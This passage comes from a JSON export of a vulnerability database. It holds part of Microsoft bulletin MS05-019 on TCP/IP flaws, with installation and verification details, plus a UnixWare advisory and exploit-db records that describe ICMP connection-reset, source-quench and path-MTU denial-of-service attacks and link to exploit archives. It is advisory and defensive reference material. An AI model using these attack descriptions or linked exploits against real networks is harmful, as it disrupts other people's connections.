seconds.\r\n\r\n/quiet\r\n\t\r\n\r\nQuiet mode - same as unattended setup mode, but no status or error messages are displayed.\r\nRestart Options\t \r\n\r\n/norestart\r\n\t\r\n\r\nDo not restart when installation has completed\r\n\r\n/forcerestart\r\n\t\r\n\r\nRestart the computer after installation and force other applications to close at shutdown without saving open files first.\r\n\r\n/warnrestart[:x]\r\n\t\r\n\r\nPresents a dialog box with a timer warning the user that the computer will restart in x seconds. &#40;Default is 30 sec&#41;. Intended for use with either /quiet or /passive switches.\r\n\r\n/promptrestart\r\n\t\r\n\r\nDisplay a dialog box prompting the local user to allow a restart\r\nSpecial Options\t \r\n\r\n/forceappsclose\r\n\t\r\n\r\nForce other programs to close when the computer shuts down\r\n\r\nFile Information\r\n\r\nThe English version of this security update has the file attributes that are listed in the following table. The dates and times for these files are listed in coordinated universal time &#40;UTC&#41;. When you view the file information, it is converted to local time. To find the difference between UTC and local time, use the Time Zone tab in the Date and Time tool in Control Panel.\r\n\r\nWindows XP Home Edition Service Pack 1, Windows XP Professional Service Pack 1, Windows XP Tablet PC Edition, Windows XP Media Center Edition, Windows XP Home Edition Service Pack 2, Windows XP Professional Service Pack 2, Windows XP Tablet PC Edition 2005, and Windows XP Media Center Edition 2005:\r\nFile Name\tVersion\tDate\tTime\tSize\tFolder\r\n\r\nTcpip.sys\r\n\t\r\n\r\n5.1.2600.1630\r\n\t\r\n\r\n23-Feb-2005\r\n\t\r\n\r\n02:00\r\n\t\r\n\r\n339,968\r\n\t\r\n\r\nSP1QFE\r\n\r\nTcpip.sys\r\n\t\r\n\r\n5.1.2600.2631\r\n\t\r\n\r\n14-Mar-2005\r\n\t\r\n\r\n00:55\r\n\t\r\n\r\n359,808\r\n\t\r\n\r\nSP2GDR\r\n\r\nTcpip.sys\r\n\t\r\n\r\n5.1.2600.2631\r\n\t\r\n\r\n14-Mar-2005\r\n\t\r\n\r\n01:17\r\n\t\r\n\r\n359,936\r\n\t\r\n\r\nSP2QFE\r\n\r\nUpdspapi.dll\r\n\t\r\n\r\n6.1.22.4\r\n\t\r\n\r\n25-Feb-2005\r\n\t\r\n\r\n03:35\r\n\t\r\n\r\n371,936\r\n\t\r\n\r\nWindows XP 64-Bit Edition Service Pack 1 &#40;Itanium&#41;:\r\nFile Name\tVersion\tDate\tTime\tSize\r\n\r\nTcpip.sys\r\n\t\r\n\r\n5.1.2600.1630\r\n\t\r\n\r\n23-Feb-2005\r\n\t\r\n\r\n00:36\r\n\t\r\n\r\n1,111,040\r\n\r\nUpdspapi.dll\r\n\t\r\n\r\n6.1.22.4\r\n\t\r\n\r\n25-Feb-2005\r\n\t\r\n\r\n02:50\r\n\t\r\n\r\n639,712\r\n\r\nWindows XP 64-Bit Edition Version 2003 &#40;Itanium&#41;:\r\nFile Name\tVersion\tDate\tTime\tSize\tFolder\r\n\r\nTcpip.sys\r\n\t\r\n\r\n5.2.3790.290\r\n\t\r\n\r\n17-Mar-2005\r\n\t\r\n\r\n03:57\r\n\t\r\n\r\n973,824\r\n\t\r\n\r\nRTMGDR\r\n\r\nTcpip.sys\r\n\t\r\n\r\n5.2.3790.290\r\n\t\r\n\r\n17-Mar-2005\r\n\t\r\n\r\n03:57\r\n\t\r\n\r\n977,408\r\n\t\r\n\r\nRTMQFE\r\n\r\nUpdspapi.dll\r\n\t\r\n\r\n6.1.22.4\r\n\t\r\n\r\n11-Mar-2005\r\n\t\r\n\r\n17:56\r\n\t\r\n\r\n639,712\r\n\t\r\n\r\nNotes The Windows XP security update is packaged as a dual-mode package. Dual-mode packages contain files for the original version of Windows XP Service Pack 1 &#40;SP1&#41; and files for Windows XP Service Pack 2 &#40;SP2&#41;.\r\n\r\nFor more information about dual-mode packages, see Microsoft Knowledge Base Article 328848.\r\n\r\nWhen you install these security updates, the installer checks to see if one or more of the files that are being updated on your system have previously been updated by a Microsoft hotfix.\r\nIf you have previously installed a hotfix to update an affected file, one of the following conditions occurs, depending on your operating system:\r\n\u2022\t\r\n\r\nWindows XP SP2\r\n\r\nThe installer copies the SP2QFE files to your system.\r\n\u2022\t\r\n\r\nWindows XP 64-Bit Edition Version 2003 &#40;Itanium&#41;\r\n\r\nThe installer copies the RTMQFE files to your system.\r\n\r\nIf you have not previously installed a hotfix to update an affected file, one of the following conditions occurs, depending on your operating system:\r\n\u2022\t\r\n\r\nWindows XP SP2\r\n\r\nThe installer copies the SP2GDR files to your system.\r\n\u2022\t\r\n\r\nWindows XP 64-Bit Edition Version 2003 &#40;Itanium&#41;\r\n\r\nThe installer copies the RTMGDR files to your system.\r\n\r\nFor more information about this behavior, see Microsoft Knowledge Base Article 824994.\r\n\r\nFor more information about the Update.exe installer, visit the Microsoft TechNet Web site.\r\n\r\nFor more information about the terminology that appears in this bulletin, such as hotfix, see Microsoft Knowledge Base Article 824684.\r\n\r\nNote For Windows XP 64-Bit Edition Version 2003 &#40;Itanium&#41;, this security update is the same as the Windows Server 2003 for Itanium-based Systems security update.\r\n\r\nVerifying that the Update Has Been Applied\r\n\u2022\t\r\n\r\nMicrosoft Baseline Security Analyzer\r\n\r\nTo verify that a security update has been applied to an affected system, you may be able to use the Microsoft Baseline Security Analyzer &#40;MBSA&#41; tool. MBSA allows administrators to scan local and remote systems for missing security updates and for common security misconfigurations. For more information about MBSA, visit the Microsoft Baseline Security Analyzer Web site.\r\n\u2022\t\r\n\r\nFile Version Verification\r\n\r\nNote Because there are several versions of Microsoft Windows, the following steps may be different on your computer. If they are, see your product documentation to complete these steps.\r\n\r\n1.\r\n\t\r\n\r\nClick Start, and then click Search.\r\n\r\n2.\r\n\t\r\n\r\nIn the Search Results pane, click All files and folders under Search Companion.\r\n\r\n3.\r\n\t\r\n\r\nIn the All or part of the file name box, type a file name from the appropriate file information table, and then click Search.\r\n\r\n4.\r\n\t\r\n\r\nIn the list of files, right-click a file name from the appropriate file information table, and then click Properties.\r\n\r\nNote Depending on the version of the operating system or programs installed, some of the files that are listed in the file information table may not be installed.\r\n\r\n5.\r\n\t\r\n\r\nOn the Version tab, determine the version of the file that is installed on your computer by comparing it to the version that is documented in the appropriate file information table.\r\n\r\nNote Attributes other than the file version may change during installation. Comparing other file attributes to the information in the file information table is not a supported method of verifying that the update has been applied. Also, in certain cases, files may be renamed during installation. If the file or version information is not present, use one of the other available methods to verify update installation.\r\n\u2022\t\r\n\r\nRegistry Key Verification\r\n\r\nYou may also be able to verify the files that this security update has installed by reviewing the following registry keys.\r\n\r\nFor Windows XP Home Edition Service Pack 1, Windows XP Professional Service Pack 1, Windows XP Tablet PC Edition, Windows XP Media Center Edition, Windows XP Home Edition Service Pack 2, Windows XP Professional Service Pack 2, Windows XP Tablet PC Edition 2005, and Windows XP Media Center Edition 2005:\r\n\r\nHKEY_LOCAL_MACHINE&#92;SOFTWARE&#92;Microsoft&#92;Updates&#92;Windows XP&#92;SP3&#92;KB893066&#92;Filelist\r\n\r\nFor Windows XP 64-Bit Edition Version 2003 &#40;Itanium&#41;:\r\n\r\nHKEY_LOCAL_MACHINE&#92;SOFTWARE&#92;Microsoft&#92;Updates&#92;Windows Server 2003&#92;SP1&#92;KB893066&#92;Filelist\r\n\r\nNote These registry keys may not contain a complete list of installed files. Also, these registry keys may not be created correctly if an administrator or an OEM integrates or slipstreams the 893066 security update into the Windows installation source files.\r\nTop of sectionTop of section\r\n\r\n\t\r\nWindows 2000 &#40;all versions&#41;\r\n\r\nPrerequisites\r\nFor Windows 2000, this security update requires Service Pack 3 &#40;SP3&#41; or Service Pack 4 &#40;SP4&#41;. For Small Business Server 2000, this security update requires Small Business Server 2000 Service Pack 1a or Small Business Server 2000 running with Windows 2000 Server Service Pack 4.\r\n\r\nThe software that is listed has been tested to determine whether the versions are affected. Other versions either no longer include security update support or may not be affected. To determine the support life cycle for your product and version, visit the Microsoft Support Lifecycle Web site.\r\n\r\nFor more information about how to obtain the latest service pack, see Microsoft Knowledge Base Article 260910.\r\n\r\nInclusion in Future Service Packs:\r\nThe update for this issue will be included in a future Update Rollup.\r\n\r\nInstallation Information\r\n\r\nThis security update supports the following setup switches:\r\nSupported Security Update Installation Switches\r\nSwitch\tDescription\r\n\r\n/help\r\n\t\r\n\r\nDisplays the command-line options\r\nSetup Modes\t \r\n\r\n/passive\r\n\t\r\n\r\nUnattended Setup mode. No user interaction is required, but installation status is displayed. If a restart is required at the end of Setup, a dialog box will be presented to the user with a timer warning that the computer will restart in 30 seconds.\r\n\r\n/quiet\r\n\t\r\n\r\nQuiet mode - same as unattended mode, but no status or error messages are displayed.\r\nRestart Options\t \r\n\r\n/norestart\r\n\t\r\n\r\nDo not restart when installation has completed\r\n\r\n/forcerestart\r\n\t\r\n\r\nRestart the computer after installation and force other applications to close at shutdown without saving open files first.\r\n\r\n/warnrestart[:x]\r\n\t\r\n\r\nPresents a dialog box with a timer warning the user that the computer will restart in x seconds. &#40;Default is 30 sec&#41;. Intended for use with either /quiet or /passive switches.\r\n\r\n/promptrestart\r\n\t\r\n\r\nDisplay a dialog box prompting the local user to allow a restart\r\nSpecial Options\t \r\n\r\n/overwriteoem\r\n\t\r\n\r\nOverwrite OEM files without prompting\r\n\r\n/nobackup\r\n\t\r\n\r\nDo not backup files needed for uninstall\r\n\r\n/forceappsclose\r\n\t\r\n\r\nForce other programs to close when the computer shuts down\r\n\r\n/log:path\r\n\t\r\n\r\nAllow the redirection of installation log files\r\n\r\n/integrate:path\r\n\t\r\n\r\nIntegrates the update into the Windows source files located at the path specified\r\n\r\n/extract[:path]\r\n\t\r\n\r\nExtracts files without starting the Setup program\r\n\r\n/ER\r\n\t\r\n\r\nEnable extended error reporting\r\n\r\n/verbose\r\n\t\r\n\r\nEnables verbose logging. During installation, creates &#37;Windir&#37;&#92;CabBuild.log. This log details the files that are copied. Using this switch may cause the installation to proceed more slowly.\r\n\r\nNote You can combine these switches into one command. For backward compatibility, the security update also supports the setup switches that the earlier version of the Setup program uses. For more information about the supported installation switches, see Microsoft Knowledge Base Article 262841. For more information about the Update.exe installer, visit the Microsoft TechNet Web site. For more information about the terminology that appears in this bulletin, such as hotfix, see Microsoft Knowledge Base Article 824684.\r\n\r\nDeployment Information\r\n\r\nTo install the security update without any user intervention, use the following command at a command prompt for Windows 2000 Service Pack 3 and Windows 2000 Service Pack 4:\r\n\r\nWindows2000-kb893066-x86-enu /quiet\r\n\r\nTo install the security update without forcing the system to restart, use the following command at a command prompt for Windows 2000 Service Pack 3 and Windows 2000 Service Pack 4:\r\n\r\nWindows2000-kb893066-x86-enu /norestart\r\n\r\nFor more information about how to deploy this security update with Software Update Services, visit the Software Update Services Web site.\r\n\r\nRestart Requirement\r\n\r\nYou must restart your system after you apply this security update.\r\n\r\nRemoval Information\r\n\r\nTo remove this security update, use the Add or Remove Programs tool in Control Panel.\r\n\r\nSystem administrators can also use the Spuninst.exe utility to remove this security update. The Spuninst.exe utility is located in the &#37;Windir&#37;&#92;$NTUninstallKB893066$&#92;Spuninst folder. The Spuninst.exe utility supports the following setup switches:\r\nSupported Spuninst.exe Switches\r\nSwitch\tDescription\r\n\r\n/help\r\n\t\r\n\r\nDisplays the command-line options\r\nSetup Modes \t \r\n\r\n/passive\r\n\t\r\n\r\nUnattended setup mode. No user interaction is required, but installation status is displayed. If a restart is required at the end of Setup, a dialog box will be presented to the user with a timer warning that the computer will restart in 30 seconds.\r\n\r\n/quiet\r\n\t\r\n\r\nQuiet mode - same as unattended setup mode, but no status or error messages are displayed.\r\nRestart Options\t \r\n\r\n/norestart\r\n\t\r\n\r\nDo not restart when installation has completed\r\n\r\n/forcerestart\r\n\t\r\n\r\nRestart the computer after installation and force other applications to close at shutdown without saving open files first.\r\n\r\n/warnrestart[:x]\r\n\t\r\n\r\nPresents a dialog box with a timer warning the user that the computer will restart in x seconds. &#40;Default is 30 sec&#41;. Intended for use with either /quiet or /passive switches.\r\n\r\n/promptrestart\r\n\t\r\n\r\nDisplay a dialog box prompting the local user to allow a restart\r\nSpecial Options\t \r\n\r\n/forceappsclose\r\n\t\r\n\r\nForce other programs to close when the computer shuts down\r\n\r\nFile Information\r\n\r\nThe English version of this security update has the file attributes that are listed in the following table. The dates and times for these files are listed in coordinated universal time &#40;UTC&#41;. When you view the file information, it is converted to local time. To find the difference between UTC and local time, use the Time Zone tab in the Date and Time tool in Control Panel.\r\n\r\nWindows 2000 Service Pack 3, Windows 2000 Service Pack 4, and Small Business Server 2000:\r\nFile Name\tVersion\tDate\tTime\tSize\r\n\r\nAfd.sys\r\n\t\r\n\r\n5.0.2195.6687\r\n\t\r\n\r\n19-Jun-2003\r\n\t\r\n\r\n19:05\r\n\t\r\n\r\n120,240\r\n\r\nMsafd.dll\r\n\t\r\n\r\n5.0.2195.6602\r\n\t\r\n\r\n19-Jun-2003\r\n\t\r\n\r\n19:05\r\n\t\r\n\r\n108,816\r\n\r\nTcpip.sys\r\n\t\r\n\r\n5.0.2195.7035\r\n\t\r\n\r\n27-Feb-2005\r\n\t\r\n\r\n02:05\r\n\t\r\n\r\n336,560\r\n\r\nTdi.sys\r\n\t\r\n\r\n5.0.2195.6655\r\n\t\r\n\r\n19-Jun-2003\r\n\t\r\n\r\n19:05\r\n\t\r\n\r\n16,240\r\n\r\nWshtcpip.dll\r\n\t\r\n\r\n5.0.2195.6601\r\n\t\r\n\r\n19-Jun-2003\r\n\t\r\n\r\n19:05\r\n\t\r\n\r\n17,680\r\n\r\nUpdspapi.dll\r\n\t\r\n\r\n6.1.22.4\r\n\t\r\n\r\n25-Feb-2005\r\n\t\r\n\r\n16:43\r\n\t\r\n\r\n371,936\r\n\r\nVerifying that the Update Has Been Applied\r\n\u2022\t\r\n\r\nMicrosoft Baseline Security Analyzer\r\n\r\nTo verify that a security update has been applied to an affected system, you may be able to use the Microsoft Baseline Security Analyzer &#40;MBSA&#41; tool. MBSA allows administrators to scan local and remote systems for missing security updates and for common security misconfigurations. For more information about MBSA, visit the Microsoft Baseline Security Analyzer Web site.\r\n\u2022\t\r\n\r\nFile Version Verification\r\n\r\nNote Because there are several versions of Microsoft Windows, the following steps may be different on your computer. If they are, see your product documentation to complete these steps.\r\n\r\n1.\r\n\t\r\n\r\nClick Start, and then click Search.\r\n\r\n2.\r\n\t\r\n\r\nIn the Search Results pane, click All files and folders under Search Companion.\r\n\r\n3.\r\n\t\r\n\r\nIn the All or part of the file name box, type a file name from the appropriate file information table, and then click Search.\r\n\r\n4.\r\n\t\r\n\r\nIn the list of files, right-click a file name from the appropriate file information table, and then click Properties.\r\n\r\nNote Depending on the version of the operating system or programs installed, some of the files that are listed in the file information table may not be installed.\r\n\r\n5.\r\n\t\r\n\r\nOn the Version tab, determine the version of the file that is installed on your computer by comparing it to the version that is documented in the appropriate file information table.\r\n\r\nNote Attributes other than the file version may change during installation. Comparing other file attributes to the information in the file information table is not a supported method of verifying that the update has been applied. Also, in certain cases, files may be renamed during installation. If the file or version information is not present, use one of the other available methods to verify update installation.\r\n\u2022\t\r\n\r\nRegistry Key Verification\r\n\r\nYou may also be able to verify the files that this security update has installed by reviewing the following registry key:\r\n\r\nHKEY_LOCAL_MACHINE&#92;SOFTWARE&#92;Microsoft&#92;Updates&#92;Windows 2000&#92;SP5&#92;KB893066&#92;Filelist\r\n\r\nNote This registry key may not contain a complete list of installed files. Also, this registry key may not be created correctly when an administrator or an OEM integrates or slipstreams the 893066 security update into the Windows installation source files.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\r\nAcknowledgments\r\n\r\nMicrosoft thanks the following for working with us to help protect customers:\r\n\u2022\t\r\n\r\nSong Liu, Hongzhen Zhou, and Neel Mehta of ISS X-Force for reporting the IP Validation Vulnerability &#40;CAN-2005-0048&#41;.\r\n\u2022\t\r\n\r\nFernando Gont of Argentina&#39;s Universidad Tecnologica Nacional/Facultad Regional Haedo, for working with us responsibly on the ICMP Connection Reset Vulnerability &#40;CAN-2004-0790&#41; and the ICMP Path MTU Vulnerability &#40;CAN-2004-1060&#41;.\r\n\u2022\t\r\n\r\nQualys for reporting the ICMP Path MTU Vulnerability &#40;CAN-2004-1060&#41;.\r\n\r\nObtaining Other Security Updates:\r\n\r\nUpdates for other security issues are available at the following locations:\r\n\u2022\t\r\n\r\nSecurity updates are available in the Microsoft Download Center. You can find them most easily by doing a keyword search for &quot;security_patch.&quot;\r\n\u2022\t\r\n\r\nUpdates for consumer platforms are available at the Windows Update Web site.\r\n\r\nSupport:\r\n\u2022\t\r\n\r\nCustomers in the U.S. and Canada can receive technical support from Microsoft Product Support Services at 1-866-PCSAFETY. There is no charge for support calls that are associated with security updates.\r\n\u2022\t\r\n\r\nInternational customers can receive support from their local Microsoft subsidiaries. There is no charge for support that is associated with security updates. For more information about how to contact Microsoft for support issues, visit the International Support Web site.\r\n\r\nSecurity Resources:\r\n\u2022\t\r\n\r\nThe Microsoft TechNet Security Web site provides additional information about security in Microsoft products.\r\n\u2022\t\r\n\r\nMicrosoft Software Update Services\r\n\u2022\t\r\n\r\nMicrosoft Baseline Security Analyzer &#40;MBSA&#41;\r\n\u2022\t\r\n\r\nWindows Update \r\n\u2022\t\r\n\r\nWindows Update Catalog: For more information about the Windows Update Catalog, see Microsoft Knowledge Base Article 323166.\r\n\u2022\t\r\n\r\nOffice Update \r\n\r\nSoftware Update Services:\r\n\r\nBy using Microsoft Software Update Services &#40;SUS&#41;, administrators can quickly and reliably deploy the latest critical updates and security updates to Windows 2000 and Windows Server 2003-based servers, and to desktop systems that are running Windows 2000 Professional or Windows XP Professional.\r\n\r\nFor more information about how to deploy this security update by using Software Update Services, visit the Software Update Services Web site.\r\n\r\nSystems Management Server:\r\n\r\nMicrosoft Systems Management Server &#40;SMS&#41; delivers a highly-configurable enterprise solution for managing updates. By using SMS, administrators can identify Windows-based systems that require security updates and can perform controlled deployment of these updates throughout the enterprise with minimal disruption to end users. For more information about how administrators can use SMS 2003 to deploy security updates, visit the SMS 2003 Security Patch Management Web site. SMS 2.0 users can also use Software Updates Service Feature Pack to help deploy security updates. For information about SMS, visit the SMS Web site.\r\n\r\nNote SMS uses the Microsoft Baseline Security Analyzer and the Microsoft Office Detection Tool to provide broad support for security bulletin update detection and deployment. Some software updates may not be detected by these tools. Administrators can use the inventory capabilities of the SMS in these cases to target updates to specific systems. For more information about this procedure, visit the following Web site. Some security updates require administrative rights following a restart of the system. Administrators can use the Elevated Rights Deployment Tool &#40;available in the SMS 2003 Administration Feature Pack and in the SMS 2.0 Administration Feature Pack&#41; to install these updates.\r\n\r\nDisclaimer:\r\n\r\nThe information provided in the Microsoft Knowledge Base is provided &quot;as is&quot; without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nRevisions: \r\n\u2022\t\r\n\r\nV1.0 &#40;April 12, 2005&#41;: Bulletin published", "edition": 1, "cvss3": {}, "published": "2005-04-13T00:00:00", "title": "Microsoft Security Bulletin MS05-019 Vulnerabilities in TCP/IP Could Allow Remote Code Execution and Denial of Service &#40;893066&#41;", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2004-0791", "CVE-2004-0790", "CVE-2005-0048", "CVE-2004-0230", "CVE-2005-0688", "CVE-2004-1060"], "modified": "2005-04-13T00:00:00", "id": "SECURITYVULNS:DOC:8310", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:8310", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:13", "description": "Release Date: 2005-09-05 \r\n\r\n \r\nCritical: \r\nLess critical \r\nImpact: DoS\r\n \r\nWhere: From remote\r\n \r\nSolution Status: Vendor Patch \r\n\r\n \r\nOS: UnixWare 7.x.x\r\n\r\n \r\n Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it. \r\n\r\n \r\nCVE reference: CAN-2004-0790\r\nCAN-2004-0791\r\nCAN-2004-1060\r\nCAN-2005-0065\r\nCAN-2005-0066\r\nCAN-2005-0067\r\nCAN-2005-0068\r\n \r\n\r\n \r\nDescription:\r\nSCO has issued an update for UnixWare. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS &#40;Denial of Service&#41; on an active TCP session.\r\n\r\nFor more information:\r\nSA14904\r\n\r\nSolution:\r\nApply updated packages.\r\n\r\nUnixWare 7.1.3:\r\nftp://ftp.sco.com/pub/updates/Un...SA-2005.36/erg712758.uw713.pkg.Z\r\n84c7d2f7e133f39ec15fceed717f080b\r\n\r\nUnixWare 7.1.4:\r\nftp://ftp.sco.com/pub/updates/Un...SA-2005.36/erg712758.uw714.pkg.Z\r\n85e314659d3ca5a2e887a91ebd71f4cc\r\n\r\nOriginal Advisory:\r\nftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.36/SCOSA-2005.36.txt\r\n\r\nOther References:\r\nSA14904:\r\nhttp://secunia.com/advisories/14904/\r\n \r\n", "edition": 1, "cvss3": {}, "published": "2005-09-05T00:00:00", "title": "UnixWare ICMP Message Handling Denial of Service", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2005-0066", "CVE-2004-0791", "CVE-2005-0065", "CVE-2004-0790", "CVE-2005-0068", "CVE-2005-0067", "CVE-2004-1060"], "modified": "2005-09-05T00:00:00", "id": "SECURITYVULNS:DOC:9653", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:9653", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2022-01-13T06:23:17", "description": "", "cvss3": {}, "published": "2005-04-12T00:00:00", "type": "exploitdb", "title": "Multiple Vendor ICMP Implementation - Spoofed Source Quench Packet Denial of Service", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060", "2004-0791"], "modified": "2005-04-12T00:00:00", "id": "EDB-ID:25387", "href": "https://www.exploit-db.com/exploits/25387", "sourceData": "source: https://www.securityfocus.com/bid/13124/info\r\n\r\nMultiple vendor implementations of TCP/IP Internet Control Message Protocol (ICMP) are reported prone to several denial-of-service attacks.\r\n\r\nICMP is employed by network nodes to determine certain automatic actions to take based on network failures reported by an ICMP message.\r\n\r\nReportedly, the RFC doesn't recommend security checks for ICMP error messages. As long as an ICMP message contains a valid source and destination IP address and port pair, it will be accepted for an associated connection.\r\n\r\nThe following individual attacks are reported:\r\n\r\n- A blind connection-reset attack. This attack takes advantage of the specification that describes that on receiving a 'hard' ICMP error, the corresponding connection should be aborted. The Mitre ID CAN-2004-0790 is assigned to this issue.\r\n\r\nA remote attacker may exploit this issue to terminate target TCP connections and deny service for legitimate users.\r\n\r\n- An ICMP Source Quench attack. This attack takes advantage of the specification that a host must react to receive ICMP Source Quench messages by slowing transmission on the associated connection. The Mitre ID CAN-2004-0791 is assigned to this issue.\r\n\r\nA remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.\r\n\r\n- An attack against ICMP PMTUD is reported to affect multiple vendors when they are configured to employ PMTUD. By sending a suitable forged ICMP message to a target host, an attacker may reduce the MTU for a given connection. The Mitre ID CAN-2004-1060 is assigned to this issue.\r\n\r\nA remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.\r\n\r\n**Update: Microsoft platforms are also reported prone to these issues. \r\n\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25387.tar.gz", "sourceHref": "https://www.exploit-db.com/download/25387", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-01-13T06:23:17", "description": "", "cvss3": {}, "published": "2005-04-12T00:00:00", "type": "exploitdb", "title": "Multiple Vendor ICMP Message Handling - Denial of Service", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060", "2004-0790"], "modified": "2005-04-12T00:00:00", "id": "EDB-ID:25389", "href": "https://www.exploit-db.com/exploits/25389", "sourceData": "source: https://www.securityfocus.com/bid/13124/info\r\n \r\nMultiple vendor implementations of TCP/IP Internet Control Message Protocol (ICMP) are reported prone to several denial-of-service attacks.\r\n \r\nICMP is employed by network nodes to determine certain automatic actions to take based on network failures reported by an ICMP message.\r\n \r\nReportedly, the RFC doesn't recommend security checks for ICMP error messages. As long as an ICMP message contains a valid source and destination IP address and port pair, it will be accepted for an associated connection.\r\n \r\nThe following individual attacks are reported:\r\n \r\n- A blind connection-reset attack. This attack takes advantage of the specification that describes that on receiving a 'hard' ICMP error, the corresponding connection should be aborted. The Mitre ID CAN-2004-0790 is assigned to this issue.\r\n \r\nA remote attacker may exploit this issue to terminate target TCP connections and deny service for legitimate users.\r\n \r\n- An ICMP Source Quench attack. This attack takes advantage of the specification that a host must react to receive ICMP Source Quench messages by slowing transmission on the associated connection. The Mitre ID CAN-2004-0791 is assigned to this issue.\r\n \r\nA remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.\r\n \r\n- An attack against ICMP PMTUD is reported to affect multiple vendors when they are configured to employ PMTUD. By sending a suitable forged ICMP message to a target host, an attacker may reduce the MTU for a given connection. The Mitre ID CAN-2004-1060 is assigned to this issue.\r\n \r\nA remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.\r\n \r\n**Update: Microsoft platforms are also reported prone to these issues.\r\n \r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25389.tar.gz", "sourceHref": "https://www.exploit-db.com/download/25389", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-01-13T06:23:17", "description": "", "cvss3": {}, "published": "2005-04-12T00:00:00", "type": "exploitdb", "title": "Multiple Vendor ICMP Implementation - Malformed Path MTU Denial of Service", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060", "2004-1060"], "modified": "2005-04-12T00:00:00", "id": "EDB-ID:25388", "href": "https://www.exploit-db.com/exploits/25388", "sourceData": "source: https://www.securityfocus.com/bid/13124/info\r\n \r\nMultiple vendor implementations of TCP/IP Internet Control Message Protocol (ICMP) are reported prone to several denial-of-service attacks.\r\n \r\nICMP is employed by network nodes to determine certain automatic actions to take based on network failures reported by an ICMP message.\r\n \r\nReportedly, the RFC doesn't recommend security checks for ICMP error messages. As long as an ICMP message contains a valid source and destination IP address and port pair, it will be accepted for an associated connection.\r\n \r\nThe following individual attacks are reported:\r\n \r\n- A blind connection-reset attack. This attack takes advantage of the specification that describes that on receiving a 'hard' ICMP error, the corresponding connection should be aborted. The Mitre ID CAN-2004-0790 is assigned to this issue.\r\n \r\nA remote attacker may exploit this issue to terminate target TCP connections and deny service for legitimate users.\r\n \r\n- An ICMP Source Quench attack. This attack takes advantage of the specification that a host must react to receive ICMP Source Quench messages by slowing transmission on the associated connection. The Mitre ID CAN-2004-0791 is assigned to this issue.\r\n \r\nA remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.\r\n \r\n- An attack against ICMP PMTUD is reported to affect multiple vendors when they are configured to employ PMTUD. By sending a suitable forged ICMP message to a target host, an attacker may reduce the MTU for a given connection. The Mitre ID CAN-2004-1060 is assigned to this issue.\r\n \r\nA remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.\r\n \r\n**Update: Microsoft platforms are also reported prone to these issues. \r\n\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25388.tar.gz", "sourceHref": "https://www.exploit-db.com/download/25388", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-01-13T07:14:24", "description": "", "cvss3": {}, "published": "2005-04-20T00:00:00", "type": "exploitdb", "title": "Multiple OS (Win32/Aix/Cisco) - Crafted ICMP Messages Denial of Service (MS05-019)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", 